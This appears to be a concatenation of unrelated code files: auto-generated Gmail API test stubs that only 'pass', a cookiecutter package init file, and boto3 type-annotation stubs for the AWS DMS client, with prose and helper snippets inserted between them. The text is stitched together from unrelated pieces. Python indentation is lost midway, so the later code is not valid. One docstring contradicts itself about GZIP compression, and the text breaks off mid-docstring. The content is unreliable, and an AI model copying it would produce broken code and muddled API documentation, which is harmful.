    def test_gmail_users_get_profile(self):
        """
        Test case for gmail_users_get_profile
        """
        pass

    def test_gmail_users_history_list(self):
        """
        Test case for gmail_users_history_list
        """
        pass

    def test_gmail_users_labels_create(self):
        """
        Test case for gmail_users_labels_create
        """
        pass

    def test_gmail_users_labels_delete(self):
        """
        Test case for gmail_users_labels_delete
        """
        pass

    def test_gmail_users_labels_get(self):
        """
        Test case for gmail_users_labels_get
        """
        pass

    def test_gmail_users_labels_list(self):
        """
        Test case for gmail_users_labels_list
        """
        pass

    def test_gmail_users_labels_patch(self):
        """
        Test case for gmail_users_labels_patch
        """
        pass

    def test_gmail_users_labels_update(self):
        """
        Test case for gmail_users_labels_update
        """
        pass

    def test_gmail_users_messages_attachments_get(self):
        """
        Test case for gmail_users_messages_attachments_get
        """
        pass

    def test_gmail_users_messages_batch_delete(self):
        """
        Test case for gmail_users_messages_batch_delete
        """
        pass

    def test_gmail_users_messages_batch_modify(self):
        """
        Test case for gmail_users_messages_batch_modify
        """
        pass
    def test_gmail_users_messages_delete(self):
        """
        Test case for gmail_users_messages_delete
        """
        pass

    def test_gmail_users_messages_get(self):
        """
        Test case for gmail_users_messages_get
        """
        pass

    def test_gmail_users_messages_import(self):
        """
        Test case for gmail_users_messages_import
        """
        pass

    def test_gmail_users_messages_insert(self):
        """
        Test case for gmail_users_messages_insert
        """
        pass

    def test_gmail_users_messages_list(self):
        """
        Test case for gmail_users_messages_list
        """
        pass

    def test_gmail_users_messages_modify(self):
        """
        Test case for gmail_users_messages_modify
        """
        pass

    def test_gmail_users_messages_send(self):
        """
        Test case for gmail_users_messages_send
        """
        pass

    def test_gmail_users_messages_trash(self):
        """
        Test case for gmail_users_messages_trash
        """
        pass

    def test_gmail_users_messages_untrash(self):
        """
        Test case for gmail_users_messages_untrash
        """
        pass

    def test_gmail_users_settings_filters_create(self):
        """
        Test case for gmail_users_settings_filters_create
        """
        pass

    def test_gmail_users_settings_filters_delete(self):
        """
        Test case for gmail_users_settings_filters_delete
        """
        pass

    def test_gmail_users_settings_filters_get(self):
        """
        Test case for gmail_users_settings_filters_get
        """
        pass

    def test_gmail_users_settings_filters_list(self):
        """
        Test case for gmail_users_settings_filters_list
        """
        pass

    def test_gmail_users_settings_forwarding_addresses_create(self):
        """
        Test case for gmail_users_settings_forwarding_addresses_create
        """
        pass

    def test_gmail_users_settings_forwarding_addresses_delete(self):
        """
        Test case for gmail_users_settings_forwarding_addresses_delete
        """
        pass

    def test_gmail_users_settings_forwarding_addresses_get(self):
        """
        Test case for gmail_users_settings_forwarding_addresses_get
        """
        pass

    def test_gmail_users_settings_forwarding_addresses_list(self):
        """
        Test case for gmail_users_settings_forwarding_addresses_list
        """
        pass

    def test_gmail_users_settings_get_auto_forwarding(self):
        """
        Test case for gmail_users_settings_get_auto_forwarding
        """
        pass

    def test_gmail_users_settings_get_imap(self):
        """
        Test case for gmail_users_settings_get_imap
"""
pass
def test_gmail_users_settings_get_pop(self):
"""
Test case for gmail_users_settings_get_pop
"""
pass
def test_gmail_users_settings_get_vacation(self):
"""
Test case for gmail_users_settings_get_vacation
"""
pass
def test_gmail_users_settings_send_as_create(self):
"""
Test case for gmail_users_settings_send_as_create
"""
pass
def test_gmail_users_settings_send_as_delete(self):
"""
Test case for gmail_users_settings_send_as_delete
"""
pass
def test_gmail_users_settings_send_as_get(self):
"""
Test case for gmail_users_settings_send_as_get
"""
pass
def test_gmail_users_settings_send_as_list(self):
"""
Test case for gmail_users_settings_send_as_list
"""
pass
def test_gmail_users_settings_send_as_patch(self):
"""
Test case for gmail_users_settings_send_as_patch
"""
pass
def test_gmail_users_settings_send_as_smime_info_delete(self):
"""
Test case for gmail_users_settings_send_as_smime_info_delete
"""
pass
def test_gmail_users_settings_send_as_smime_info_get(self):
"""
Test case for gmail_users_settings_send_as_smime_info_get
"""
pass
def test_gmail_users_settings_send_as_smime_info_insert(self):
"""
Test case for gmail_users_settings_send_as_smime_info_insert
"""
pass
def test_gmail_users_settings_send_as_smime_info_list(self):
"""
Test case for gmail_users_settings_send_as_smime_info_list
"""
pass
def test_gmail_users_settings_send_as_smime_info_set_default(self):
"""
Test case for gmail_users_settings_send_as_smime_info_set_default
"""
pass
def test_gmail_users_settings_send_as_update(self):
"""
Test case for gmail_users_settings_send_as_update
"""
pass
def test_gmail_users_settings_send_as_verify(self):
"""
Test case for gmail_users_settings_send_as_verify
"""
pass
def test_gmail_users_settings_update_auto_forwarding(self):
"""
Test case for gmail_users_settings_update_auto_forwarding
"""
pass
def test_gmail_users_settings_update_imap(self):
"""
Test case for gmail_users_settings_update_imap
"""
pass
def test_gmail_users_settings_update_pop(self):
"""
Test case for gmail_users_settings_update_pop
"""
pass
def test_gmail_users_settings_update_vacation(self):
"""
Test case for gmail_users_settings_update_vacation
"""
pass
def test_gmail_users_stop(self):
"""
Test case for gmail_users_stop
"""
pass
def test_gmail_users_threads_delete(self):
"""
Test case for gmail_users_threads_delete
"""
pass
def test_gmail_users_threads_get(self):
"""
Test case for gmail_users_threads_get
"""
pass
def test_gmail_users_threads_list(self):
"""
Test case for gmail_users_threads_list
"""
pass
def test_gmail_users_threads_modify(self):
"""
Test case for gmail_users_threads_modify
"""
pass
def test_gmail_users_threads_trash(self):
"""
Test case for gmail_users_threads_trash
"""
pass
def test_gmail_users_threads_untrash(self):
"""
Test case for gmail_users_threads_untrash
"""
pass
def test_gmail_users_watch(self):
"""
Test case for gmail_users_watch
"""
pass
if __name__ == '__main__':
unittest.main()
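The generated stubs above all `pass`. One way to flesh a stub out without real Gmail credentials is to substitute a `unittest.mock.Mock` for the generated `UsersApi`; the method name and response shape below are hypothetical, since the generated client's actual signatures may differ:

```python
import unittest
from unittest import mock


class TestUsersApiExample(unittest.TestCase):
    def setUp(self):
        # Replace the generated UsersApi with a mock; no network access needed.
        self.api = mock.Mock()

    def test_gmail_users_drafts_list(self):
        # Hypothetical method and response shape -- the generated client may differ.
        self.api.gmail_users_drafts_list.return_value = {
            'drafts': [], 'resultSizeEstimate': 0,
        }
        result = self.api.gmail_users_drafts_list('me')
        self.api.gmail_users_drafts_list.assert_called_once_with('me')
        self.assertEqual(result['resultSizeEstimate'], 0)
```

Run with `python -m unittest` as usual; the mock records the call and returns the canned response, so the test exercises only the test's own logic.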
# template/{{cookiecutter.repository_name}}/{{cookiecutter.package_name}}/problem/__init__.py
# (Aiwizo/ml-workflow, Apache-2.0)
from {{cookiecutter.package_name}}.problem.example import Example
from {{cookiecutter.package_name}}.problem.evaluate_datasets import (
evaluate_datasets
)
# boto3_type_annotations_with_docs/boto3_type_annotations/dms/client.py
# (cowboygneox/boto3_type_annotations, MIT)
from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from datetime import datetime
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def add_tags_to_resource(self, ResourceArn: str, Tags: List) -> Dict:
"""
Adds metadata tags to an AWS DMS resource, including replication instance, endpoint, security group, and migration task. These tags can also be used with cost allocation reporting to track cost associated with DMS resources, or used in a Condition statement in an IAM policy for DMS.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/AddTagsToResource>`_
**Request Syntax**
::
response = client.add_tags_to_resource(
ResourceArn='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type ResourceArn: string
:param ResourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the AWS DMS resource the tag is to be added to. AWS DMS resources include a replication instance, endpoint, and a replication task.
:type Tags: list
:param Tags: **[REQUIRED]**
The tag to be assigned to the DMS resource.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
:rtype: dict
:returns:
"""
pass
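The tag constraints documented above (keys 1-128 characters, values up to 256, no `aws:`/`dms:` prefix) can be pre-checked client-side before calling `add_tags_to_resource`. This is a sketch using a simplified pattern, since Python's `re` module does not support the `\p{...}` classes of the documented Java regex:

```python
import re

# Rough approximation of the documented Java regex
# "^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$"; \w and \s stand in for the Unicode
# letter/number and space classes.
_TAG_RE = re.compile(r'^[\w\s.:/=+\-]*$', re.UNICODE)


def validate_tag(key, value):
    """Pre-check one tag against the documented AddTagsToResource limits."""
    if not 1 <= len(key) <= 128 or len(value) > 256:
        return False
    if key.lower().startswith(('aws:', 'dms:')) or value.lower().startswith(('aws:', 'dms:')):
        return False
    return bool(_TAG_RE.match(key)) and bool(_TAG_RE.match(value))


tags = [{'Key': 'Environment', 'Value': 'staging'}]
ok = all(validate_tag(t['Key'], t['Value']) for t in tags)
```

A list that passes this check can then be handed to `client.add_tags_to_resource(ResourceArn=..., Tags=tags)`; the service still performs the authoritative validation.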
def apply_pending_maintenance_action(self, ReplicationInstanceArn: str, ApplyAction: str, OptInType: str) -> Dict:
"""
Applies a pending maintenance action to a resource (for example, to a replication instance).
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ApplyPendingMaintenanceAction>`_
**Request Syntax**
::
response = client.apply_pending_maintenance_action(
ReplicationInstanceArn='string',
ApplyAction='string',
OptInType='string'
)
**Response Syntax**
::
{
'ResourcePendingMaintenanceActions': {
'ResourceIdentifier': 'string',
'PendingMaintenanceActionDetails': [
{
'Action': 'string',
'AutoAppliedAfterDate': datetime(2015, 1, 1),
'ForcedApplyDate': datetime(2015, 1, 1),
'OptInStatus': 'string',
'CurrentApplyDate': datetime(2015, 1, 1),
'Description': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
- **ResourcePendingMaintenanceActions** *(dict) --*
The AWS DMS resource that the pending maintenance action will be applied to.
- **ResourceIdentifier** *(string) --*
The Amazon Resource Name (ARN) of the DMS resource that the pending maintenance action applies to. For information about creating an ARN, see `Constructing an Amazon Resource Name (ARN) <https://docs.aws.amazon.com/dms/latest/UserGuide/USER_Tagging.html#USER_Tagging.ARN>`__ in the DMS documentation.
- **PendingMaintenanceActionDetails** *(list) --*
Detailed information about the pending maintenance action.
- *(dict) --*
- **Action** *(string) --*
The type of pending maintenance action that is available for the resource.
- **AutoAppliedAfterDate** *(datetime) --*
The date of the maintenance window when the action will be applied. The maintenance action will be applied to the resource during its first maintenance window after this date. If this date is specified, any ``next-maintenance`` opt-in requests are ignored.
- **ForcedApplyDate** *(datetime) --*
The date when the maintenance action will be automatically applied. The maintenance action will be applied to the resource on this date regardless of the maintenance window for the resource. If this date is specified, any ``immediate`` opt-in requests are ignored.
- **OptInStatus** *(string) --*
Indicates the type of opt-in request that has been received for the resource.
- **CurrentApplyDate** *(datetime) --*
The effective date when the pending maintenance action will be applied to the resource. This date takes into account opt-in requests received from the ``ApplyPendingMaintenanceAction`` API, the ``AutoAppliedAfterDate`` , and the ``ForcedApplyDate`` . This value is blank if an opt-in request has not been received and nothing has been specified as ``AutoAppliedAfterDate`` or ``ForcedApplyDate`` .
- **Description** *(string) --*
A description providing more detail about the maintenance action.
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the AWS DMS resource that the pending maintenance action applies to.
:type ApplyAction: string
:param ApplyAction: **[REQUIRED]**
The pending maintenance action to apply to this resource.
:type OptInType: string
:param OptInType: **[REQUIRED]**
A value that specifies the type of opt-in request, or undoes an opt-in request. An opt-in request of type ``immediate`` cannot be undone.
Valid values:
* ``immediate`` - Apply the maintenance action immediately.
* ``next-maintenance`` - Apply the maintenance action during the next maintenance window for the resource.
* ``undo-opt-in`` - Cancel any existing ``next-maintenance`` opt-in requests.
:rtype: dict
:returns:
"""
pass
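Because an `immediate` opt-in cannot be undone, it can be worth validating `OptInType` against the three documented values before calling the API. A minimal sketch (the helper name and the `system-update` action string are illustrative, not part of the API):

```python
VALID_OPT_IN_TYPES = {'immediate', 'next-maintenance', 'undo-opt-in'}


def build_maintenance_request(replication_instance_arn, apply_action, opt_in_type):
    """Assemble kwargs for apply_pending_maintenance_action, rejecting
    opt-in types outside the documented set."""
    if opt_in_type not in VALID_OPT_IN_TYPES:
        raise ValueError('OptInType must be one of %s' % sorted(VALID_OPT_IN_TYPES))
    return {
        'ReplicationInstanceArn': replication_instance_arn,
        'ApplyAction': apply_action,
        'OptInType': opt_in_type,
    }


request = build_maintenance_request(
    'arn:aws:dms:us-east-1:123456789012:rep:EXAMPLE',  # hypothetical ARN
    'system-update',
    'next-maintenance',
)
```

The resulting dict can be expanded straight into the call: `client.apply_pending_maintenance_action(**request)`.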
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
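The `can_paginate`/`get_paginator` pattern described above can be wrapped generically. The sketch below demonstrates it against a tiny fake client rather than a live boto3 client, so the response pages and the `Endpoints` result key are stand-ins:

```python
def iter_all(client, operation, result_key, **kwargs):
    """Yield every item from an operation, using a paginator when one exists
    and falling back to a single direct call otherwise."""
    if client.can_paginate(operation):
        paginator = client.get_paginator(operation)
        for page in paginator.paginate(**kwargs):
            for item in page.get(result_key, []):
                yield item
    else:
        for item in getattr(client, operation)(**kwargs).get(result_key, []):
            yield item


class FakePaginator:
    def paginate(self, **kwargs):
        # Two pages of fake results, as a paginator would transparently fetch.
        yield {'Endpoints': [{'EndpointIdentifier': 'a'}]}
        yield {'Endpoints': [{'EndpointIdentifier': 'b'}]}


class FakeClient:
    def can_paginate(self, operation_name):
        return operation_name == 'describe_endpoints'

    def get_paginator(self, operation_name):
        return FakePaginator()


endpoints = list(iter_all(FakeClient(), 'describe_endpoints', 'Endpoints'))
```

With a real client the call would look the same, e.g. `iter_all(client, 'describe_endpoints', 'Endpoints')`, and the paginator would handle the marker tokens across pages.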
def create_endpoint(self, EndpointIdentifier: str, EndpointType: str, EngineName: str, Username: str = None, Password: str = None, ServerName: str = None, Port: int = None, DatabaseName: str = None, ExtraConnectionAttributes: str = None, KmsKeyId: str = None, Tags: List = None, CertificateArn: str = None, SslMode: str = None, ServiceAccessRoleArn: str = None, ExternalTableDefinition: str = None, DynamoDbSettings: Dict = None, S3Settings: Dict = None, DmsTransferSettings: Dict = None, MongoDbSettings: Dict = None, KinesisSettings: Dict = None, ElasticsearchSettings: Dict = None, RedshiftSettings: Dict = None) -> Dict:
"""
Creates an endpoint using the provided settings.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/CreateEndpoint>`_
**Request Syntax**
::
response = client.create_endpoint(
EndpointIdentifier='string',
EndpointType='source'|'target',
EngineName='string',
Username='string',
Password='string',
ServerName='string',
Port=123,
DatabaseName='string',
ExtraConnectionAttributes='string',
KmsKeyId='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
CertificateArn='string',
SslMode='none'|'require'|'verify-ca'|'verify-full',
ServiceAccessRoleArn='string',
ExternalTableDefinition='string',
DynamoDbSettings={
'ServiceAccessRoleArn': 'string'
},
S3Settings={
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'CsvRowDelimiter': 'string',
'CsvDelimiter': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'CompressionType': 'none'|'gzip',
'EncryptionMode': 'sse-s3'|'sse-kms',
'ServerSideEncryptionKmsKeyId': 'string',
'DataFormat': 'csv'|'parquet',
'EncodingType': 'plain'|'plain-dictionary'|'rle-dictionary',
'DictPageSizeLimit': 123,
'RowGroupLength': 123,
'DataPageSize': 123,
'ParquetVersion': 'parquet-1-0'|'parquet-2-0',
'EnableStatistics': True|False,
'CdcInsertsOnly': True|False
},
DmsTransferSettings={
'ServiceAccessRoleArn': 'string',
'BucketName': 'string'
},
MongoDbSettings={
'Username': 'string',
'Password': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'AuthType': 'no'|'password',
'AuthMechanism': 'default'|'mongodb_cr'|'scram_sha_1',
'NestingLevel': 'none'|'one',
'ExtractDocId': 'string',
'DocsToInvestigate': 'string',
'AuthSource': 'string',
'KmsKeyId': 'string'
},
KinesisSettings={
'StreamArn': 'string',
'MessageFormat': 'json',
'ServiceAccessRoleArn': 'string'
},
ElasticsearchSettings={
'ServiceAccessRoleArn': 'string',
'EndpointUri': 'string',
'FullLoadErrorPercentage': 123,
'ErrorRetryDuration': 123
},
RedshiftSettings={
'AcceptAnyDate': True|False,
'AfterConnectScript': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'ConnectionTimeout': 123,
'DatabaseName': 'string',
'DateFormat': 'string',
'EmptyAsNull': True|False,
'EncryptionMode': 'sse-s3'|'sse-kms',
'FileTransferUploadStreams': 123,
'LoadTimeout': 123,
'MaxFileSize': 123,
'Password': 'string',
'Port': 123,
'RemoveQuotes': True|False,
'ReplaceInvalidChars': 'string',
'ReplaceChars': 'string',
'ServerName': 'string',
'ServiceAccessRoleArn': 'string',
'ServerSideEncryptionKmsKeyId': 'string',
'TimeFormat': 'string',
'TrimBlanks': True|False,
'TruncateColumns': True|False,
'Username': 'string',
'WriteBufferSize': 123
}
)
**Response Syntax**
::
{
'Endpoint': {
'EndpointIdentifier': 'string',
'EndpointType': 'source'|'target',
'EngineName': 'string',
'EngineDisplayName': 'string',
'Username': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'ExtraConnectionAttributes': 'string',
'Status': 'string',
'KmsKeyId': 'string',
'EndpointArn': 'string',
'CertificateArn': 'string',
'SslMode': 'none'|'require'|'verify-ca'|'verify-full',
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'ExternalId': 'string',
'DynamoDbSettings': {
'ServiceAccessRoleArn': 'string'
},
'S3Settings': {
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'CsvRowDelimiter': 'string',
'CsvDelimiter': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'CompressionType': 'none'|'gzip',
'EncryptionMode': 'sse-s3'|'sse-kms',
'ServerSideEncryptionKmsKeyId': 'string',
'DataFormat': 'csv'|'parquet',
'EncodingType': 'plain'|'plain-dictionary'|'rle-dictionary',
'DictPageSizeLimit': 123,
'RowGroupLength': 123,
'DataPageSize': 123,
'ParquetVersion': 'parquet-1-0'|'parquet-2-0',
'EnableStatistics': True|False,
'CdcInsertsOnly': True|False
},
'DmsTransferSettings': {
'ServiceAccessRoleArn': 'string',
'BucketName': 'string'
},
'MongoDbSettings': {
'Username': 'string',
'Password': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'AuthType': 'no'|'password',
'AuthMechanism': 'default'|'mongodb_cr'|'scram_sha_1',
'NestingLevel': 'none'|'one',
'ExtractDocId': 'string',
'DocsToInvestigate': 'string',
'AuthSource': 'string',
'KmsKeyId': 'string'
},
'KinesisSettings': {
'StreamArn': 'string',
'MessageFormat': 'json',
'ServiceAccessRoleArn': 'string'
},
'ElasticsearchSettings': {
'ServiceAccessRoleArn': 'string',
'EndpointUri': 'string',
'FullLoadErrorPercentage': 123,
'ErrorRetryDuration': 123
},
'RedshiftSettings': {
'AcceptAnyDate': True|False,
'AfterConnectScript': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'ConnectionTimeout': 123,
'DatabaseName': 'string',
'DateFormat': 'string',
'EmptyAsNull': True|False,
'EncryptionMode': 'sse-s3'|'sse-kms',
'FileTransferUploadStreams': 123,
'LoadTimeout': 123,
'MaxFileSize': 123,
'Password': 'string',
'Port': 123,
'RemoveQuotes': True|False,
'ReplaceInvalidChars': 'string',
'ReplaceChars': 'string',
'ServerName': 'string',
'ServiceAccessRoleArn': 'string',
'ServerSideEncryptionKmsKeyId': 'string',
'TimeFormat': 'string',
'TrimBlanks': True|False,
'TruncateColumns': True|False,
'Username': 'string',
'WriteBufferSize': 123
}
}
}
**Response Structure**
- *(dict) --*
- **Endpoint** *(dict) --*
The endpoint that was created.
- **EndpointIdentifier** *(string) --*
The database endpoint identifier. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
- **EndpointType** *(string) --*
The type of endpoint.
- **EngineName** *(string) --*
The database engine name. Valid values, depending on the EndPointType, include mysql, oracle, postgres, mariadb, aurora, aurora-postgresql, redshift, s3, db2, azuredb, sybase, dynamodb, mongodb, and sqlserver.
- **EngineDisplayName** *(string) --*
The expanded name for the engine name. For example, if the ``EngineName`` parameter is "aurora," this value would be "Amazon Aurora MySQL."
- **Username** *(string) --*
The user name used to connect to the endpoint.
- **ServerName** *(string) --*
The name of the server at the endpoint.
- **Port** *(integer) --*
The port value used to access the endpoint.
- **DatabaseName** *(string) --*
The name of the database at the endpoint.
- **ExtraConnectionAttributes** *(string) --*
Additional connection attributes used to connect to the endpoint.
- **Status** *(string) --*
The status of the endpoint.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **CertificateArn** *(string) --*
The Amazon Resource Name (ARN) used for SSL connection to the endpoint.
- **SslMode** *(string) --*
The SSL mode used to connect to the endpoint.
SSL mode can be one of four values: none, require, verify-ca, verify-full.
The default value is none.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **ExternalId** *(string) --*
Value returned by a call to CreateEndpoint that can be used for cross-account validation. Use it on a subsequent call to CreateEndpoint to create the endpoint with a cross-account.
- **DynamoDbSettings** *(dict) --*
The settings for the target DynamoDB database. For more information, see the ``DynamoDBSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **S3Settings** *(dict) --*
The settings for the S3 target endpoint. For more information, see the ``S3Settings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **CsvRowDelimiter** *(string) --*
The delimiter used to separate rows in the source files. The default is a carriage return (``\n`` ).
- **CsvDelimiter** *(string) --*
The delimiter used to separate columns in the source files. The default is a comma.
- **BucketFolder** *(string) --*
An optional parameter to set a folder name in the S3 bucket. If provided, tables are created in the path ``<bucketFolder>/<schema_name>/<table_name>/`` . If this parameter is not specified, then the path used is ``<schema_name>/<table_name>/`` .
- **BucketName** *(string) --*
The name of the S3 bucket.
- **CompressionType** *(string) --*
An optional parameter to use GZIP to compress the target files. Set to GZIP to compress the target files. Set to NONE (the default) or do not use to leave the files uncompressed. Applies to both CSV and PARQUET data formats.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either ``SSE_S3`` (default) or ``SSE_KMS`` . To use ``SSE_S3`` , you need an IAM role with permission to allow ``"arn:aws:s3:::dms-*"`` to use the following actions:
* s3:CreateBucket
* s3:ListBucket
* s3:DeleteBucket
* s3:GetBucketLocation
* s3:GetObject
* s3:PutObject
* s3:DeleteObject
* s3:GetObjectVersion
* s3:GetBucketPolicy
* s3:PutBucketPolicy
* s3:DeleteBucketPolicy
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
Here is a CLI example: ``aws dms create-endpoint --endpoint-identifier <value> --endpoint-type target --engine-name s3 --s3-settings ServiceAccessRoleArn=<value>,BucketFolder=<value>,BucketName=<value>,EncryptionMode=SSE_KMS,ServerSideEncryptionKmsKeyId=<value>``
- **DataFormat** *(string) --*
The format of the data which you want to use for output. You can choose one of the following:
* ``CSV`` : This is a row-based format with comma-separated values.
* ``PARQUET`` : Apache Parquet is a columnar storage format that features efficient compression and provides faster query response.
- **EncodingType** *(string) --*
The type of encoding you are using: ``RLE_DICTIONARY`` (default), ``PLAIN`` , or ``PLAIN_DICTIONARY`` .
* ``RLE_DICTIONARY`` uses a combination of bit-packing and run-length encoding to store repeated values more efficiently.
* ``PLAIN`` does not use encoding at all. Values are stored as they are.
* ``PLAIN_DICTIONARY`` builds a dictionary of the values encountered in a given column. The dictionary is stored in a dictionary page for each column chunk.
- **DictPageSizeLimit** *(integer) --*
The maximum size of an encoded dictionary page of a column. If the dictionary page exceeds this, this column is stored using an encoding type of ``PLAIN`` . Defaults to 1024 * 1024 bytes (1MiB), the maximum size of a dictionary page before it reverts to ``PLAIN`` encoding. For ``PARQUET`` format only.
- **RowGroupLength** *(integer) --*
The number of rows in a row group. A smaller row group size provides faster reads, but as the number of row groups grows, writes become slower. Defaults to 10,000 (ten thousand) rows. For ``PARQUET`` format only.
If you choose a value larger than the maximum, ``RowGroupLength`` is set to the max row group length in bytes (64 * 1024 * 1024).
- **DataPageSize** *(integer) --*
The size of one data page in bytes. Defaults to 1024 * 1024 bytes (1MiB). For ``PARQUET`` format only.
- **ParquetVersion** *(string) --*
The version of Apache Parquet format you want to use: ``PARQUET_1_0`` (default) or ``PARQUET_2_0`` .
- **EnableStatistics** *(boolean) --*
Enables statistics for Parquet pages and rowGroups. Choose ``TRUE`` to enable statistics, choose ``FALSE`` to disable. Statistics include ``NULL`` , ``DISTINCT`` , ``MAX`` , and ``MIN`` values. Defaults to ``TRUE`` . For ``PARQUET`` format only.
- **CdcInsertsOnly** *(boolean) --*
Option to write only ``INSERT`` operations to the comma-separated value (CSV) output files. By default, the first field in a CSV record contains the letter ``I`` (insert), ``U`` (update) or ``D`` (delete) to indicate whether the row was inserted, updated, or deleted at the source database. If ``cdcInsertsOnly`` is set to true, then only ``INSERT`` s are recorded in the CSV file, without the ``I`` annotation on each line. Valid values are ``TRUE`` and ``FALSE`` .
- **DmsTransferSettings** *(dict) --*
The settings in JSON format for the DMS transfer type of source endpoint.
Possible attributes include the following:
* ``serviceAccessRoleArn`` - The IAM role that has permission to access the Amazon S3 bucket.
* ``bucketName`` - The name of the S3 bucket to use.
* ``compressionType`` - An optional parameter to use GZIP to compress the target files. To use GZIP, set this value to ``NONE`` (the default). To keep the files uncompressed, don't use this value.
Shorthand syntax for these attributes is as follows: ``ServiceAccessRoleArn=string,BucketName=string,CompressionType=string``
JSON syntax for these attributes is as follows: ``{ "ServiceAccessRoleArn": "string", "BucketName": "string", "CompressionType": "none"|"gzip" }``
- **ServiceAccessRoleArn** *(string) --*
The IAM role that has permission to access the Amazon S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket to use.
- **MongoDbSettings** *(dict) --*
The settings for the MongoDB source endpoint. For more information, see the ``MongoDbSettings`` structure.
- **Username** *(string) --*
The user name you use to access the MongoDB source endpoint.
- **Password** *(string) --*
The password for the user account you use to access the MongoDB source endpoint.
- **ServerName** *(string) --*
The name of the server on the MongoDB source endpoint.
- **Port** *(integer) --*
The port value for the MongoDB source endpoint.
- **DatabaseName** *(string) --*
The database name on the MongoDB source endpoint.
- **AuthType** *(string) --*
The authentication type you use to access the MongoDB source endpoint.
Valid values: NO, PASSWORD
When NO is selected, user name and password parameters are not used and can be empty.
- **AuthMechanism** *(string) --*
The authentication mechanism you use to access the MongoDB source endpoint.
Valid values: DEFAULT, MONGODB_CR, SCRAM_SHA_1
DEFAULT – For MongoDB version 2.x, use MONGODB_CR. For MongoDB version 3.x, use SCRAM_SHA_1. This attribute is not used when authType=No.
- **NestingLevel** *(string) --*
Specifies either document or table mode.
Valid values: NONE, ONE
Default value is NONE. Specify NONE to use document mode. Specify ONE to use table mode.
- **ExtractDocId** *(string) --*
Specifies the document ID. Use this attribute when ``NestingLevel`` is set to NONE.
Default value is false.
- **DocsToInvestigate** *(string) --*
Indicates the number of documents to preview to determine the document organization. Use this attribute when ``NestingLevel`` is set to ONE.
Must be a positive value greater than 0. Default value is 1000.
- **AuthSource** *(string) --*
The MongoDB database name. This attribute is not used when ``authType=NO`` .
The default is admin.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **KinesisSettings** *(dict) --*
The settings for the Amazon Kinesis source endpoint. For more information, see the ``KinesisSettings`` structure.
- **StreamArn** *(string) --*
The Amazon Resource Name (ARN) for the Amazon Kinesis Data Streams endpoint.
- **MessageFormat** *(string) --*
The output format for the records created on the endpoint. The message format is ``JSON`` .
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) for the IAM role that DMS uses to write to the Amazon Kinesis data stream.
- **ElasticsearchSettings** *(dict) --*
The settings for the Elasticsearch source endpoint. For more information, see the ``ElasticsearchSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
